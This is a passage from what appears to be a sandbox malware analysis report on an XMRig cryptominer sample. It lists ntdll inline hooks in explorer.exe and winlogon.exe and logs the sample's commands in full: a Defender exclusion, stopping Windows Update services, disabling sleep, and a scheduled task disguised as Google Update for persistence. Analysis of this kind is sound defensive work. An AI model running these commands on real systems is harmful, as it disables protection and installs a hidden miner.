                            Aug 12, 2024 15:37:50.467325926 CEST9.9.9.9192.168.11.200xed25Name error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false
                            Aug 12, 2024 15:37:56.966959953 CEST9.9.9.9192.168.11.200x4c5aName error (3)xmr.test.lolnonenoneA (IP address)IN (0x0001)false

                            Code Manipulations

                            User Modules

                            Hook Summary

                            Function NameHook TypeActive in Processes
                            ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                            NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                            ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                            NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                            ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                            NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                            NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                            ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                            ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                            NtResumeThreadINLINEexplorer.exe, winlogon.exe
                            RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                            NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                            NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                            ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                            ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                            Processes

                            Process: explorer.exe, Module: ntdll.dll
                            Function NameHook TypeNew Data
                            ZwEnumerateKeyINLINE0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                            NtQuerySystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                            ZwResumeThreadINLINE0xE9 0x98 0x83 0x32 0x29 0x9F
                            NtDeviceIoControlFileINLINE0xE9 0x9E 0xE3 0x33 0x35 0x5F
                            ZwDeviceIoControlFileINLINE0xE9 0x9E 0xE3 0x33 0x35 0x5F
                            NtEnumerateKeyINLINE0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                            NtQueryDirectoryFileINLINE0xE9 0x98 0x83 0x32 0x2D 0xDF
                            ZwEnumerateValueKeyINLINE0xE9 0x9E 0xE3 0x33 0x32 0x2F
                            ZwQuerySystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                            NtResumeThreadINLINE0xE9 0x98 0x83 0x32 0x29 0x9F
                            RtlGetNativeSystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                            NtQueryDirectoryFileExINLINE0xE9 0x95 0x53 0x30 0x0C 0xCF
                            NtEnumerateValueKeyINLINE0xE9 0x9E 0xE3 0x33 0x32 0x2F
                            ZwQueryDirectoryFileExINLINE0xE9 0x95 0x53 0x30 0x0C 0xCF
                            ZwQueryDirectoryFileINLINE0xE9 0x98 0x83 0x32 0x2D 0xDF
                            Process: winlogon.exe, Module: ntdll.dll
                            Function NameHook TypeNew Data
                            ZwEnumerateKeyINLINE0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                            NtQuerySystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                            ZwResumeThreadINLINE0xE9 0x98 0x83 0x32 0x29 0x9F
                            NtDeviceIoControlFileINLINE0xE9 0x9E 0xE3 0x33 0x35 0x5F
                            ZwDeviceIoControlFileINLINE0xE9 0x9E 0xE3 0x33 0x35 0x5F
                            NtEnumerateKeyINLINE0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                            NtQueryDirectoryFileINLINE0xE9 0x98 0x83 0x32 0x2D 0xDF
                            ZwEnumerateValueKeyINLINE0xE9 0x9E 0xE3 0x33 0x32 0x2F
                            ZwQuerySystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                            NtResumeThreadINLINE0xE9 0x98 0x83 0x32 0x29 0x9F
                            RtlGetNativeSystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                            NtQueryDirectoryFileExINLINE0xE9 0x95 0x53 0x30 0x0C 0xCF
                            NtEnumerateValueKeyINLINE0xE9 0x9E 0xE3 0x33 0x32 0x2F
                            ZwQueryDirectoryFileExINLINE0xE9 0x95 0x53 0x30 0x0C 0xCF
                            ZwQueryDirectoryFileINLINE0xE9 0x98 0x83 0x32 0x2D 0xDF

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:09:35:40
                            Start date:12/08/2024
                            Path:C:\Users\user\Desktop\test2.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\test2.exe"
                            Imagebase:0x7ff661540000
                            File size:5'986'304 bytes
                            MD5 hash:80B97CC01243BE6495F5DF52BCDD6BDF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:09:35:42
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                            Imagebase:0x7ff775920000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:3
                            Start time:09:35:42
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                            Imagebase:0x7ff71ed80000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop UsoSvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:8
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop WaaSMedicSvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:9
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop wuauserv
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:10
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop bits
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:11
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop dosvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:12
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            Imagebase:0x7ff71ed80000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:13
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:14
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\dialer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\dialer.exe
                            Imagebase:0x7ff762260000
                            File size:39'936 bytes
                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:15
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -hibernate-timeout-ac 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                            Imagebase:0x7ff775920000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:18
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\winlogon.exe
                            Wow64 process (32bit):false
                            Commandline:winlogon.exe
                            Imagebase:0x7ff6488b0000
                            File size:944'128 bytes
                            MD5 hash:A987B43E6A8E8F894B98A3DF022DB518
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:19
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -hibernate-timeout-dc 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:20
                            Start time:09:35:45
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -standby-timeout-ac 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:09:35:45
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -standby-timeout-dc 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:09:35:45
                            Start date:12/08/2024
                            Path:C:\Windows\System32\lsass.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\lsass.exe
                            Imagebase:0x7ff6ba2e0000
                            File size:59'448 bytes
                            MD5 hash:15A556DEF233F112D127025AB51AC2D3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:23
                            Start time:09:35:46
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:24
                            Start time:09:35:46
                            Start date:12/08/2024
                            Path:C:\Windows\System32\dwm.exe
                            Wow64 process (32bit):false
                            Commandline:"dwm.exe"
                            Imagebase:0x7ff6692f0000
                            File size:94'720 bytes
                            MD5 hash:5C27608411832C5B39BA04E33D53536C
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:25
                            Start time:09:35:49
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:26
                            Start time:09:35:50
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:27
                            Start time:09:35:50
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:30
                            Start time:09:35:50
                            Start date:12/08/2024
                            Path:C:\Program Files\Google\Chrome\updater.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\updater.exe"
                            Imagebase:0x7ff62dcc0000
                            File size:5'986'304 bytes
                            MD5 hash:80B97CC01243BE6495F5DF52BCDD6BDF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, Author: unknown
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 55%, Virustotal, Browse
                            Has exited:true

                            General

                            Target ID:31
                            Start time:09:35:50
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:32
                            Start time:09:35:51
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:33
                            Start time:09:35:52
                            Start date:12/08/2024
                            Path:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe
                            Imagebase:0x7ff7924f0000
                            File size:365'360 bytes
                            MD5 hash:B6BAD2BD8596D9101874E9042B8E2D63
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:34
                            Start time:09:35:52
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:35
                            Start time:09:35:52
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:36
                            Start time:09:35:52
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                            Imagebase:0x7ff775920000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:37
                            Start time:09:35:52
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:38
                            Start time:09:35:54
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:39
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:40
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe
                            Imagebase:0x7ff69f760000
                            File size:521'536 bytes
                            MD5 hash:3B0DF35583675DE5A08E8D4C1271CEC0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:41
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe
                            Imagebase:0x7ff7733d0000
                            File size:399'664 bytes
                            MD5 hash:91038D45A86B5465E8B7E5CD63187150
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:42
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                            Imagebase:0x7ff71ed80000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:43
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:44
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop UsoSvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:45
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop WaaSMedicSvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:46
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop wuauserv
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:47
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:48
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop bits
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:49
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop dosvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:50
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            Imagebase:0x7ff71ed80000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:51
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:52
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -hibernate-timeout-ac 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:53
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\dialer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\dialer.exe
                            Imagebase:0x7ff762260000
                            File size:39'936 bytes
                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:54
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
